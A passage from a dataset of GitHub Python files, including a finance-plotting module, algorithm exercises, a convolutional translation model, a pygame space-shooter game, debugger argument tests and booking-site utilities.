liquid_plot(df_liq_in, avg_month):\n \"\"\"\n Creates a plot for the liquid evolution\n\n Args:\n df_liq_in: dataframe with liquid info\n avg_month: month to use in time average\n\n Returns:\n the plotly plot as html-div format\n \"\"\"\n\n df = df_liq_in.set_index(c.cols.DATE)\n df = u.time_average(df.fillna(0), avg_month)\n\n data = [\n go.Scatter(x=df.index, y=df[c.names.TOTAL], marker={\"color\": \"black\"}, name=c.names.TOTAL)\n ]\n\n # If config file use it\n if c.yml.LIQUID in YML:\n for name, config in YML[c.yml.LIQUID].items():\n\n # Check that accounts are in the config\n mlist = [x for x in config[c.yml.ACCOUNTS] if x in df.columns]\n\n df_aux = df[mlist].sum(axis=1)\n color = u.get_colors((config[c.yml.COLOR_NAME], config[c.yml.COLOR_INDEX]))\n\n data.append(go.Bar(x=df_aux.index, y=df_aux, marker={\"color\": color}, name=name))\n\n # If not, simply plot the present columns\n else:\n for col in df.columns:\n if col != c.names.TOTAL:\n data.append(go.Bar(x=df.index, y=df[col], name=col))\n\n layout = go.Layout(title=\"Liquid evolution\", barmode=\"stack\")\n return go.Figure(data=data, layout=layout)\n\n\ndef plot_expenses_vs_liquid(df_liquid_in, df_trans_in, avg_month, show_rec=True, height=None):\n \"\"\"\n Creates a plot to compare liquid and expenses\n\n Args:\n df_liq_in: dataframe with liquid info\n df_trans_in: dataframe with transactions\n avg_month: month to use in time average\n show_rec: bool for show/hide recommended liquids\n height: height of the plot\n\n Returns:\n the plotly plot as html-div format\n \"\"\"\n\n df_l = df_liquid_in.set_index(c.cols.DATE).copy()\n df_l = u.time_average(df_l.fillna(0), avg_month)\n\n df_t = u.group_df_by(df_trans_in[df_trans_in[c.cols.TYPE] == c.names.EXPENSES], \"M\")\n df_t = u.time_average(df_t, avg_month)\n\n iter_data = [\n (df_t, df_t[c.cols.AMOUNT], c.names.EXPENSES, c.colors.EXPENSES),\n (df_l, df_l[c.names.TOTAL], c.names.LIQUID, c.colors.LIQUID),\n (df_t, MONTHS_MIN * df_t[c.cols.AMOUNT], c.names.LIQUID_MIN_REC, c.colors.LIQUID_MIN_REC),\n (df_t, MONTHS_REC * df_t[c.cols.AMOUNT], c.names.LIQUID_REC, c.colors.LIQUID_REC),\n ]\n\n if not show_rec:\n iter_data = iter_data[:2]\n\n data = [\n go.Scatter(x=df.index, y=y, name=name, marker={\"color\": color}, mode=\"lines\")\n for df, y, name, color in iter_data\n ]\n\n layout = go.Layout(title=\"Liquid vs Expenses\", showlegend=show_rec, height=height)\n return go.Figure(data=data, layout=layout)\n\n\ndef plot_months(df_liquid_in, df_trans_in, avg_month, show_rec=True, height=None):\n \"\"\"\n Creates a plot to compare liquid and expenses\n\n Args:\n df_liq_in: dataframe with liquid info\n df_trans_in: dataframe with transactions\n avg_month: month to use in time average\n show_rec: bool for show/hide recommended liquids\n height: height of the plot\n\n Returns:\n the plotly plot as html-div format\n \"\"\"\n\n df_l = df_liquid_in.set_index(c.cols.DATE).copy()\n df_l = u.time_average(df_l.fillna(0), avg_month)\n\n df_t = u.group_df_by(df_trans_in[df_trans_in[c.cols.TYPE] == c.names.EXPENSES], \"M\")\n df_t = u.time_average(df_t, avg_month)\n\n serie = df_l[c.names.TOTAL] / df_t[c.cols.AMOUNT]\n\n iter_data = [\n (serie, \"Months\", c.colors.LIQUID),\n ([MONTHS_MIN] * len(serie), \"Minimum months of liquid\", c.colors.LIQUID_MIN_REC),\n ([MONTHS_REC] * len(serie), \"Recommended months of liquid\", c.colors.LIQUID_REC),\n ]\n\n if not show_rec:\n iter_data = iter_data[:1]\n\n data = [\n go.Scatter(x=serie.index, y=y, name=name, marker={\"color\": color}, mode=\"lines\")\n for y, name, color in iter_data\n ]\n\n layout = go.Layout(title=\"Survival months with current liquid\", height=height)\n return go.Figure(data=data, layout=layout)\n","repo_name":"villoro/expensor_personal","sub_path":"src/plots/plots_liquid.py","file_name":"plots_liquid.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"74004964248","text":"import sys\r\nfrom bisect import bisect_left\r\nread = sys.stdin.readline\r\n\r\n\r\ndef bisrch(low,high,target,arr) :\r\n while low <= high :\r\n mid = (low+high) // 2\r\n\r\n if arr[mid] < target :\r\n low = mid + 1\r\n else :\r\n high = mid - 1\r\n return high + 1\r\n\r\nN,H = map(int,read().split())\r\nbottom,top = [],[]\r\nfor i in range(N) :\r\n tmp = int(read())\r\n if i % 2 == 0 :\r\n bottom.append(tmp)\r\n else :\r\n top.append(tmp)\r\n\r\nbottom.sort()\r\ntop.sort()\r\n\r\nans,cnt = N,0\r\nfor h in range(1,H+1) :\r\n cntB = len(bottom) - bisect_left(bottom,h)\r\n cntT = len(top) - bisect_left(top,H-h+1)\r\n \r\n # cntB = len(bottom) - bisrch(0,len(bottom)-1,h,bottom)\r\n # cntT = len(top) - bisrch(0,len(top)-1,H-h+1,top)\r\n \r\n if ans == cntB + cntT :\r\n cnt += 1\r\n \r\n elif ans > cntB + cntT : \r\n cnt = 1\r\n ans = cntB + cntT\r\n\r\nprint(ans,cnt)\r\n\r\n","repo_name":"kanghuiseon/algorithmStudy","sub_path":"Rare6_이분탐색/wons/3020_개똥벌레.py","file_name":"3020_개똥벌레.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5697939841","text":"# 1. Min, Avg, Max\r\n\r\n# Write a function get_min_avg_max (sequence) that returns a tuple with three values, the smallest, the arithmetic mean, and the largest value in the string, respectively.\r\n\r\n# Example:\r\n\r\n# get_min_avg_max ([0,10,1,9]) -> (0,5,10)\r\n\r\n# the incoming sequence can be a tuple or a list with numeric values.\r\n\r\n# num_list = [0, 10, 1, 9]\r\n\r\n\r\n# def get_min_avg_max(num_list):\r\n# return min(num_list), round(mean(num_list), 4), max(num_list)\r\n# my_tuple = []\r\n# get_min = min(num_list)\r\n# get_avg = sum(num_list)/len(num_list)\r\n# get_max = max(num_list)\r\n# my_tuple = (get_min, get_avg, get_max)\r\n\r\n# print(my_tuple)\r\n# return get_min, get_avg, get_max\r\n\r\n\r\n# get_min_avg_max([0, 10, 1, 9])\r\n\r\n\r\n# 2. Common Elements\r\n\r\n# Write a function that returns a tuple with common elements in three sequences. Inputs can be list, tuple, string.\r\n\r\n# get_common_elements(seq1, seq2, seq3)\r\n\r\n# Example:\r\n\r\n# get_common_elements(\"abc\", ['a', 'b'], ('b', 'c')) -> ('b',) # we return a tuple with a single element\r\n\r\n# # remember that we can convert strings to set with set(mystring), and set to tuple with tuple(myset)\r\n\r\ndef get_common_elements(seq1, seq2, seq3):\r\n\r\n set1 = set(seq1)\r\n set2 = set(seq2)\r\n set3 = set(seq3)\r\n my_tuple = set1.intersection(set2, set3)\r\n print(my_tuple)\r\n return my_tuple\r\n\r\n\r\nget_common_elements(\"abc\", ['a', 'b'], ('b', 'c'))\r\n\r\n# 2. b For those with some experience\r\n\r\n# BONUS: make a function that can handle an arbitrary number of input sequences\r\n# so function which takes any number of sequences and returns a tuple with common elements\r\n# get_common_elements(seq1, seq2, seq3, seq4, seq5, seq6, seq7) etc :), so just like print takes any number of values\r\n","repo_name":"zhiravetska/SheGoesTech_22","sub_path":"Day9_Tuples/day9_exercises.py","file_name":"day9_exercises.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3303412134","text":"from tqdm import tqdm\n\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch import nn\nimport torch.nn.functional as F\nfrom nltk.translate.bleu_score import corpus_bleu\n\nfrom utils.rnn_utils import *\nfrom utils.logger import setup_logger\nfrom utils.train import prepare, train_epochs, estimate_batch_time_simple, compute_parameters_number\nfrom utils.cnn2rnn_utils import labels_from_target\n\nlogger = logging.getLogger('runner')\n\ndef resolve_rnn(input_size: int, cell_name: str, model_setup: dict) -> nn.Module:\n if cell_name == 'GRU':\n constructor = nn.GRU\n elif cell_name == 'LSTM':\n constructor = nn.LSTM\n elif cell_name == 'RNN':\n constructor = nn.RNN\n else:\n raise NotImplementedError()\n\n return constructor(\n input_size=input_size,\n hidden_size=model_setup['hidden_size'],\n dropout=model_setup['dropout'],\n num_layers=model_setup['layers'],\n bidirectional=model_setup['bidirectional']\n )\n\n\nclass CNN(nn.Module):\n def __init__(self, model_setup, embedding, device):\n super(CNN, self).__init__()\n\n hid_dim = model_setup['hidden_size']\n emb_dim = model_setup['input_size']\n kernel_size = model_setup['kernel_size']\n n_layers = model_setup['n_layers']\n dropout = model_setup['dropout']\n\n self.scale = torch.sqrt(torch.FloatTensor([0.5])).to(device)\n self.device = device\n self.tok_embedding = embedding\n self.pos_embedding = nn.Embedding(model_setup['max_length'], emb_dim)\n self.emb2hid = nn.Linear(emb_dim, hid_dim)\n self.hid2emb = nn.Linear(hid_dim, emb_dim)\n\n self.convs = nn.ModuleList([nn.Conv1d(in_channels=hid_dim,\n out_channels=2 * hid_dim,\n kernel_size=kernel_size,\n padding=(kernel_size - 1) // 2)\n for _ in range(n_layers)])\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, src):\n batch_size = src.shape[0]\n src_len = src.shape[1]\n pos = torch.arange(0, src_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)\n tok_embedded = self.tok_embedding(src)\n pos_embedded = self.pos_embedding(pos)\n embedded = self.dropout(tok_embedded + pos_embedded)\n conv_input = self.emb2hid(embedded)\n conv_input = conv_input.permute(0, 2, 1)\n for i, conv in enumerate(self.convs):\n conved = conv(self.dropout(conv_input))\n conved = F.glu(conved, dim=1)\n conved = (conved + conv_input) * self.scale\n conv_input = conved\n conved = self.hid2emb(conved.permute(0, 2, 1))\n combined = (conved + embedded) * self.scale\n return conved, combined\n\n\nclass DecoderCNN(nn.Module):\n def __init__(self,\n model_setup,\n embedding,\n pad_idx,\n device,\n max_length=500):\n super().__init__()\n hid_dim = model_setup['hidden_size']\n emb_dim = model_setup['input_size']\n kernel_size = model_setup['kernel_size']\n n_layers = model_setup['n_layers']\n dropout = model_setup['dropout']\n\n self.kernel_size = kernel_size\n self.trg_pad_idx = pad_idx\n self.device = device\n\n self.scale = torch.sqrt(torch.FloatTensor([0.5])).to(device)\n\n self.tok_embedding = embedding\n self.pos_embedding = nn.Embedding(max_length, emb_dim)\n\n self.emb2hid = nn.Linear(emb_dim, hid_dim)\n self.hid2emb = nn.Linear(hid_dim, emb_dim)\n\n self.attn_hid2emb = nn.Linear(hid_dim, emb_dim)\n self.attn_emb2hid = nn.Linear(emb_dim, hid_dim)\n\n self.fc_out = nn.Linear(emb_dim, embedding.num_embeddings)\n\n self.convs = nn.ModuleList([nn.Conv1d(in_channels=hid_dim,\n out_channels=2 * hid_dim,\n kernel_size=kernel_size)\n for _ in range(n_layers)])\n\n self.dropout = nn.Dropout(dropout)\n\n def calculate_attention(self, embedded, conved, encoder_conved, encoder_combined):\n conved_emb = self.attn_hid2emb(conved.permute(0, 2, 1))\n combined = (conved_emb + embedded) * self.scale\n energy = torch.matmul(combined, encoder_conved.permute(0, 2, 1))\n attention = F.softmax(energy, dim=2)\n attended_encoding = torch.matmul(attention, encoder_combined)\n attended_encoding = self.attn_emb2hid(attended_encoding)\n attended_combined = (conved + attended_encoding.permute(0, 2, 1)) * self.scale\n return attention, attended_combined\n\n def forward(self, trg, encoder_conved, encoder_combined):\n batch_size = trg.shape[0]\n trg_len = trg.shape[1]\n pos = torch.arange(0, trg_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)\n tok_embedded = self.tok_embedding(trg)\n pos_embedded = self.pos_embedding(pos)\n embedded = self.dropout(tok_embedded + pos_embedded)\n conv_input = self.emb2hid(embedded)\n conv_input = conv_input.permute(0, 2, 1)\n batch_size = conv_input.shape[0]\n hid_dim = conv_input.shape[1]\n for i, conv in enumerate(self.convs):\n conv_input = self.dropout(conv_input)\n padding = torch.zeros(batch_size,\n hid_dim,\n self.kernel_size - 1).fill_(self.trg_pad_idx).to(self.device)\n padded_conv_input = torch.cat((padding, conv_input), dim=2)\n conved = conv(padded_conv_input)\n conved = F.glu(conved, dim=1)\n attention, conved = self.calculate_attention(embedded,\n conved,\n encoder_conved,\n encoder_combined)\n conved = (conved + conv_input) * self.scale\n conv_input = conved\n conved = self.hid2emb(conved.permute(0, 2, 1))\n output = self.fc_out(self.dropout(conved))\n return output, attention\n\nclass CNN2CNN(nn.Module):\n def __init__(self,\n encoder_setup: dict,\n decoder_setup: dict,\n encoder_embedding: nn.Embedding,\n decoder_embedding: nn.Embedding,\n en_vocab,\n ru_vocab,\n dec_pad_idx,\n device,\n model_name):\n super().__init__()\n self.encoder = CNN(encoder_setup, encoder_embedding, device)\n self.decoder = DecoderCNN(decoder_setup, decoder_embedding, dec_pad_idx, device)\n self.device = device\n self.name = model_name\n self.en_vocab = en_vocab\n self.ru_vocab = ru_vocab\n\n def forward(self, src, trg, *args):\n src = src.T\n trg = trg.T\n encoder_conved, encoder_combined = self.encoder(src)\n output, attention = self.decoder(trg, encoder_conved, encoder_combined)\n return output\n\n def translate(self, en_tokens, max_len=50):\n en_tokens = en_tokens.T\n batch_size = en_tokens.shape[0]\n encoder_conved, encoder_combined = self.encoder(en_tokens)\n\n trg_indexes = torch.tensor([[self.ru_vocab.stoi[BOS_TOKEN]] * batch_size], dtype=torch.long, device=device).T\n for i in range(max_len):\n with torch.no_grad():\n output, attention = self.decoder(trg_indexes, encoder_conved, encoder_combined)\n pred_token = output.argmax(2)[:, [-1]]\n trg_indexes = torch.hstack([trg_indexes, pred_token])\n # if pred_token == self.ru_vocab.stoi[EOS_TOKEN]:\n # break\n return trg_indexes[:, 1:]\n\n\ndef init_arguments():\n encoder_setup = {\n 'max_length': 128,\n 'input_size': 256,\n 'kernel_size': 3,\n 'n_layers': 10,\n 'hidden_size': 512,\n 'dropout': 0.25\n }\n\n decoder_setup = {\n 'max_length': 128,\n 'input_size': 256,\n 'kernel_size': 3,\n 'n_layers': 10,\n 'hidden_size': 512,\n 'dropout': 0.25\n }\n\n enc_emb_setup = {\n 'embedding_size': 256,\n 'max_length': 128\n }\n\n dec_emb_setup = {\n 'embedding_size': 256,\n 'max_length': 128\n }\n\n train_params = {\n 'lr': 0.001,\n 'epochs': 20,\n 'batch_size': 128\n }\n\n return encoder_setup, decoder_setup, enc_emb_setup, dec_emb_setup, train_params\n\n\ndef init_embeds(encoder_setup, decoder_setup, enc_emb_setup, dec_emb_setup, train_params):\n dataset, train_data, valid_data, test_data = load_dataset_local(EN_field, RU_field, 'data.txt')\n en_vocab = build_vocab(EN_field, dataset)\n ru_vocab = build_vocab(RU_field, dataset)\n\n\n # weights = EN_field.vocab.vectors\n # mask = (weights[:, 0] == 0.0)\n # mean, std = weights[~mask].mean(), weights[~mask].std()\n # weights[mask] = torch.normal(mean, std, weights[mask].size())\n\n en_tokens = len(en_vocab.stoi)\n ru_tokens = len(ru_vocab.stoi)\n encoder_embedding = nn.Embedding(en_tokens, enc_emb_setup['embedding_size'], padding_idx=en_vocab.stoi[PAD_TOKEN])\n decoder_embedding = nn.Embedding(ru_tokens, dec_emb_setup['embedding_size'], padding_idx=ru_vocab.stoi[PAD_TOKEN])\n\n dataset = (dataset, train_data, valid_data, test_data)\n embeds = (encoder_embedding, decoder_embedding)\n vocabs = (en_vocab, ru_vocab)\n setups = (encoder_setup, decoder_setup)\n logger.info('Initialized params: loaded dataset, vocabs, embeds')\n return train_params, setups, vocabs, embeds, dataset\n\n\ndef build_seq2seq(setups, embeds, model_name, dec_pad_idx, en_vocab, ru_vocab):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n encoder_setup, decoder_setup = setups\n\n en_embed, ru_embed = embeds\n seq2seq = CNN2CNN(encoder_setup, decoder_setup, en_embed, ru_embed,\n en_vocab, ru_vocab, dec_pad_idx,\n device, model_name).to(device)\n logger.info('Initialized model')\n return seq2seq, device\n\n\ndef bleu_score(model, iterator_test, get_text):\n logger.info('Start BLEU scoring')\n original_text = []\n generated_text = []\n model.eval()\n BOS_TOKEN_ID = model.ru_vocab.stoi[EOS_TOKEN]\n with torch.no_grad():\n for i, batch in tqdm(enumerate(iterator_test)):\n src = batch.en\n trg = batch.ru\n\n output = model.translate(src, max(50, trg.shape[0]))\n trg = trg.cpu().numpy().T\n output = output.detach().cpu().numpy()\n original = [get_text(x) for x in trg]\n generated = [get_text(x) for x in output]\n generated = [gen[:len(original[i])] for i, gen in enumerate(generated)]\n original_text.extend(original)\n generated_text.extend(generated)\n score = corpus_bleu([[text] for text in original_text], generated_text) * 100\n logger.info('Finished BLEU scoring')\n logger.info('BLEU score: %.2f', score)\n\n return score\n\nif __name__ == '__main__':\n\n\n setup_logger()\n model_name = 'CNN2CNN'\n logger.info(f'Model {model_name}')\n writer = SummaryWriter('exp_CNN2CNN')\n encoder_setup, decoder_setup, enc_emb_setup, dec_emb_setup, train_params = init_arguments()\n train_params, setups, vocabs, embeds, datasets = init_embeds(encoder_setup, decoder_setup, enc_emb_setup, dec_emb_setup, train_params)\n (en_vocab, ru_vocab) = vocabs\n pad_idx = ru_vocab.stoi[PAD_TOKEN]\n seq2seq, device = build_seq2seq(setups, embeds, model_name, pad_idx, en_vocab, ru_vocab)\n\n RU_SEQ_LEN = 50\n EN_SEQ_LEN = 45\n BATCH_SIZE = 32\n estimated_time = estimate_batch_time_simple(seq2seq, model_name, BATCH_SIZE, EN_SEQ_LEN, RU_SEQ_LEN, device, 100)\n nparams = compute_parameters_number(seq2seq, model_name)\n\n optimizer, scheduler, criterion, (train_iterator, valid_iterator, test_iterator) = prepare(train_params,\n seq2seq,\n datasets,\n device,\n pad_idx,\n prepare_iterators)\n convert_text = lambda x: get_text(x, lambda y: ru_vocab.itos[y])\n train_epochs(\n seq2seq,\n train_iterator,\n valid_iterator,\n optimizer,\n scheduler,\n criterion,\n train_params['epochs'],\n writer,\n lambda x, device: EN_field.process(x, device),\n convert_text,\n labels_from_target\n )\n\n score = bleu_score(seq2seq, test_iterator, convert_text)\n","repo_name":"evgerher/nlp-lab2-2","sub_path":"cnn2cnn.py","file_name":"cnn2cnn.py","file_ext":"py","file_size_in_byte":12048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74467569688","text":"import pygame\nimport random\nimport math\nfrom pygame import mixer\n\n\n# Initialization pygame\npygame.init()\n\n# create screen\n\nSCREEN_WIDTH = 1100\nSCREEN_HEIGHT = 750\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nbigfont = pygame.font.Font(None, 80)\nsmallfont = pygame.font.Font(None, 45)\n\n# Title and Icon\npygame.display.set_caption('Alien Invasion')\nicon = pygame.image.load('icon.png')\npygame.display.set_icon(icon)\n\n# background Image\nbackground = pygame.image.load('main_background.jpg')\n\n# background Music\nmixer.music.load('background.wav')\nmixer.music.play(-1)\n\n# Player\nplayerImg = pygame.image.load('space-invaders .png')\nplayerX = 470\nplayerY = 610\nplayerX_change = 0\n\n# Enemy\nenemyImg = []\nenemyX = []\nenemyY = []\nenemyX_change = []\nenemyY_change = []\n\nnumber_of_enemies = 15\nfor i in range(number_of_enemies):\n enemyImg.append(pygame.image.load('space-enemy.png'))\n enemyX.append(random.randint(0, 1027))\n enemyY.append(random.randint(140, 230))\n enemyX_change.append(3)\n enemyY_change.append(40)\n\n# bullet\n# Ready - you can't see bullet on screen\n# Fire - the bullet currently moving\nbulletImg = pygame.image.load('bullet.png')\nbulletX = 0\nbulletY = 610\nbulletX_change = 0\nbulletY_change = 5\nbullet_state = 'ready'\n\n# score\n\nscore_value = 0\nfont = pygame.font.Font('Hardigan.otf', 32)\n\ntextX = 10\ntestY = 10\n\n# game over\nover_font = pygame.font.Font('Hardigan.otf', 70)\n\n# staring def function\n# first page to play game page\n\nplay_background = pygame.image.load('background.jpg')\n\n\ndef play_game():\n text = bigfont.render('PLAY', ' ', 13, (255, 255, 255))\n textx = SCREEN_WIDTH / 2 - text.get_width() / 2\n texty = SCREEN_HEIGHT / 2 - text.get_height() / 2\n textx_size = text.get_width()\n texty_size = text.get_height()\n pygame.draw.rect(screen, (255, 255, 255), ((textx - 5, texty - 5),\n (textx_size + 10, texty_size +\n 10)))\n screen.blit(play_background, (0, 0))\n screen.blit(text, (SCREEN_WIDTH / 2 - text.get_width() / 2,\n SCREEN_HEIGHT / 2 - text.get_height() / 2))\n\n pygame.display.flip()\n in_main_menu = True\n while in_main_menu:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n in_main_menu = False\n pygame.display.quit()\n pygame.quit()\n quit()\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n x, y = event.pos\n if x >= textx - 5 and x <= textx + textx_size + 5:\n if y >= texty - 5 and y <= texty + texty_size + 5:\n in_main_menu = False\n break\nplay_game()\n\ndef player(x, y):\n screen.blit(playerImg, (x, y))\n\n\ndef enemy(x, y, i):\n screen.blit(enemyImg[i], (x, y))\n\n\ndef fire_bullet(x, y):\n global bullet_state\n bullet_state = 'fire'\n screen.blit(bulletImg, (x + 16, y + 6))\n\n\ndef isCollision(enemyX, enemyY, bulletX, bulletY):\n distance = math.sqrt(math.pow(enemyX - bulletX, 2)) + (math.pow(enemyY - bulletY, 2))\n if distance < 32:\n return True\n else:\n return False\n\n\ndef show_score(x, y):\n score = font.render('score:' + str(score_value), True, (255, 255, 255))\n screen.blit(score, (x, y))\n\n\ndef game_over_text():\n over_text = over_font.render('GAME OVER ', '', True, (255, 255, 255))\n screen.blit(over_text, (370, 250))\n\n\ndef Quit():\n text = bigfont.render('Quit', 13, (0, 0, 0))\n textx = SCREEN_WIDTH / 2 - text.get_width() / 2\n texty = SCREEN_HEIGHT / 2 - text.get_height() / 2\n textx_size = text.get_width()\n texty_size = text.get_height()\n pygame.draw.rect(screen, (255, 255, 255), ((textx - 5, texty - 5),\n (textx_size + 10, texty_size +\n 10)))\n\n screen.blit(text, (SCREEN_WIDTH / 2 - text.get_width() / 2,\n SCREEN_HEIGHT / 2 - text.get_height() / 2))\n\n\n pygame.display.flip()\n in_main_menu = True\n while in_main_menu:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n in_main_menu = False\n pygame.display.quit()\n pygame.quit()\n quit()\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n x, y = event.pos\n if x >= textx - 5 and x <= textx + textx_size + 5:\n if y >= texty - 5 and y <= texty + texty_size + 5:\n in_main_menu = False\n\n\n\n# Game loop\n\nrunning = True\nwhile running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # If key stroke is pressed check whether its left or right\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_c:\n play_game()\n\n if event.key == pygame.K_LEFT:\n playerX_change -= 2\n\n if event.key == pygame.K_RIGHT:\n playerX_change += 2\n if event.key == pygame.K_SPACE:\n if bullet_state == \"ready\":\n bullet_Sound = mixer.Sound('laser.wav')\n bullet_Sound.play()\n # Get the current x co_ordinate of spaceship\n bulletX = playerX\n fire_bullet(playerX, bulletY)\n\n if event.type == pygame.KEYUP:\n playerX_change = 0\n\n # RGB red,green,blue\n screen.fill((0, 0, 0))\n screen.blit(background, (0, 0))\n\n # player movement\n\n playerX += playerX_change\n\n if playerX <= 0:\n playerX = 0\n if playerX >= 1030:\n playerX = 1030\n\n # Enemy movement\n\n for i in range(number_of_enemies):\n\n # Game over\n if enemyY[i] > 588:\n for j in range(number_of_enemies):\n enemyY[j] = 2000\n\n game_over_text()\n show_score(textX, testY)\n Quit()\n pygame.quit()\n quit()\n\n enemyX[i] += enemyX_change[i]\n if enemyX[i] <= 0:\n enemyX_change[i] = 1.9\n enemyY[i] += enemyY_change[i]\n elif enemyX[i] >= 1027:\n enemyX_change[i] = -1.9\n enemyY[i] += enemyY_change[i]\n\n # Collision\n\n collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)\n if collision:\n explosion_Sound = mixer.Sound('explosion.wav')\n explosion_Sound.play()\n\n bulletY = 610\n bullet_state = 'ready'\n score_value += 2\n\n enemyX[i] = random.randint(0, 1027)\n enemyY[i] = random.randint(40, 130)\n\n enemy(enemyX[i], enemyY[i], i)\n\n # bullet movement\n if bulletY <= 0:\n bulletY = 610\n bullet_state = 'ready'\n\n if bullet_state == 'fire':\n fire_bullet(bulletX, bulletY)\n bulletY -= bulletY_change\n\n # Update of screen\n player(playerX, playerY)\n show_score(textX, testY)\n\n pygame.display.update()\n","repo_name":"jayrathod3210/alienAinvension","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33578143649","text":"import epdblib.debugger\nimport epdb\nimport sys\nimport unittest\nfrom coverage import coverage\n\nclass EpdbStub:\n def __init__(self, uds_file=None, dbgmods=[]):\n self.uds_file = uds_file\n self.dbgmods = dbgmods\n\nclass ArgumentTestCase(unittest.TestCase):\n def setUp(self):\n self._orig_epdb_cls = epdblib.debugger.Epdb\n epdblib.debugger.Epdb = EpdbStub\n self.cov = coverage(data_file=\".coverage.opts\", source=['epdb', \"epdblib\"], cover_pylib=True)\n self.cov.start()\n\n def test_uds_file(self):\n dbg, mainpyfile = epdb.parse_args(['epdb.py', '--uds', '/tmp/test', 'testfile'])\n self.assertEqual(mainpyfile, 'testfile')\n self.assertEqual(dbg.uds_file, '/tmp/test')\n self.assertEqual(dbg.dbgmods, [''])\n\n def test_uds_file(self):\n dbg, mainpyfile = epdb.parse_args(['epdb.py', '--dbgmods', '/tmp/dbgmods', 'dbgfile'])\n self.assertEqual(mainpyfile, 'dbgfile')\n self.assertEqual(dbg.dbgmods, ['/tmp/dbgmods'])\n self.assertEqual(dbg.uds_file, None)\n\n def test_incorrect(self):\n self.assertRaises(epdb.UsageException,\n epdb.parse_args, ['epdb.py', '--dbgmods'])\n self.assertRaises(epdb.UsageException,\n epdb.parse_args, ['epdb.py', '--uds'])\n self.assertRaises(epdb.UsageException,\n epdb.parse_args, ['epdb.py'])\n\n def tearDown(self):\n epdblib.debugger.Epdb = self._orig_epdb_cls\n self.cov.stop()\n self.cov.save()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"native-human/epdb","sub_path":"tests/test_opts.py","file_name":"test_opts.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"31"} +{"seq_id":"10203173452","text":"import datetime\n\n\ndef format_price(price):\n return f'{price/100:.2f}'\n\n\ndef first_three_characters(user_name):\n return user_name[:3]\n\n\ndef description_limiter(description):\n if len(description) <= 50:\n return description\n description = description[:50]\n after_last_space = description.rfind(' ')\n description = description[:after_last_space]\n if description[-1] == ',' or description[-1] == '.':\n description = description[:-1]\n return description + '...'\n\n\ndef room_name_checker(room_name):\n valid_rooms = ['room', 'suite', 'villa', 'apartment', 'cabin', 'house', 'flat', 'studio', 'chalet', 'cottage', 'bungalow', 'penthouse', 'condo', 'guesthouse', 'tent', 'camping spot', 'treehouse', 'houseboat', 'barn', 'hut', 'dome house', 'lighthouse', 'windmill']\n for room in valid_rooms:\n if room in room_name.lower():\n return room_name\n return room_name + ' Room'\n\n\nbed_capacity = {\n 'Single': 1,\n 'Queen': 2,\n 'Double': 2,\n 'King': 2,\n 'Super King': 2,\n 'Bunk': 2,\n 'Triple Bunk': 3,\n 'Floor Space': 1,\n}\n\ndef format_beds(bed_tuple_dict_items):\n formatted_bed_strings = []\n for bed_tuple_data in bed_tuple_dict_items:\n bed_type = bed_tuple_data[0]\n number_of_beds_for_bed_type = bed_tuple_data[1]// bed_capacity[bed_type]\n if number_of_beds_for_bed_type == 1:\n formatted_bed_strings.append(f\"{number_of_beds_for_bed_type} {bed_type} bed\")\n else:\n formatted_bed_strings.append(f\"{number_of_beds_for_bed_type} {bed_type} beds\")\n return formatted_bed_strings\n\n\ndef get_dates(start_date, end_date):\n date_list = []\n current_date = start_date\n while current_date < end_date:\n date_list.append(current_date)\n current_date += datetime.timedelta(days=1)\n return date_list\n","repo_name":"shakey0/ShuffleShackProject","sub_path":"ShuffleShackApp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72331226008","text":"class Solution(object):\n def findMaxConsecutiveOnes(self, nums):\n\n if len(nums) == 1:\n return nums[0]\n\n first = 0\n second = 0\n max_distance = 0\n\n while second < len(nums):\n if nums[first] == 1 and nums[second] == 1:\n\n distance = second - first +1\n\n if distance > max_distance:\n max_distance = distance\n second += 1\n else:\n first = second\n first += 1\n second += 1\n\n return max_distance\n \nuser_input = [1,0,1,1,0,1]\nprint(Solution().findMaxConsecutiveOnes(user_input))\n","repo_name":"galethegreat/LeetCode","sub_path":"Explore/Arrays_101/maxConsecutiveOnes.py","file_name":"maxConsecutiveOnes.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20938473872","text":"from django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import DeleteView\nfrom django.contrib.auth.mixins import (\n LoginRequiredMixin,\n UserPassesTestMixin\n)\nfrom actions.utils import create_action\nfrom actions.models import Action\nfrom .decorators import ajax_required\nfrom .models import Post, PostImage\nfrom .forms import 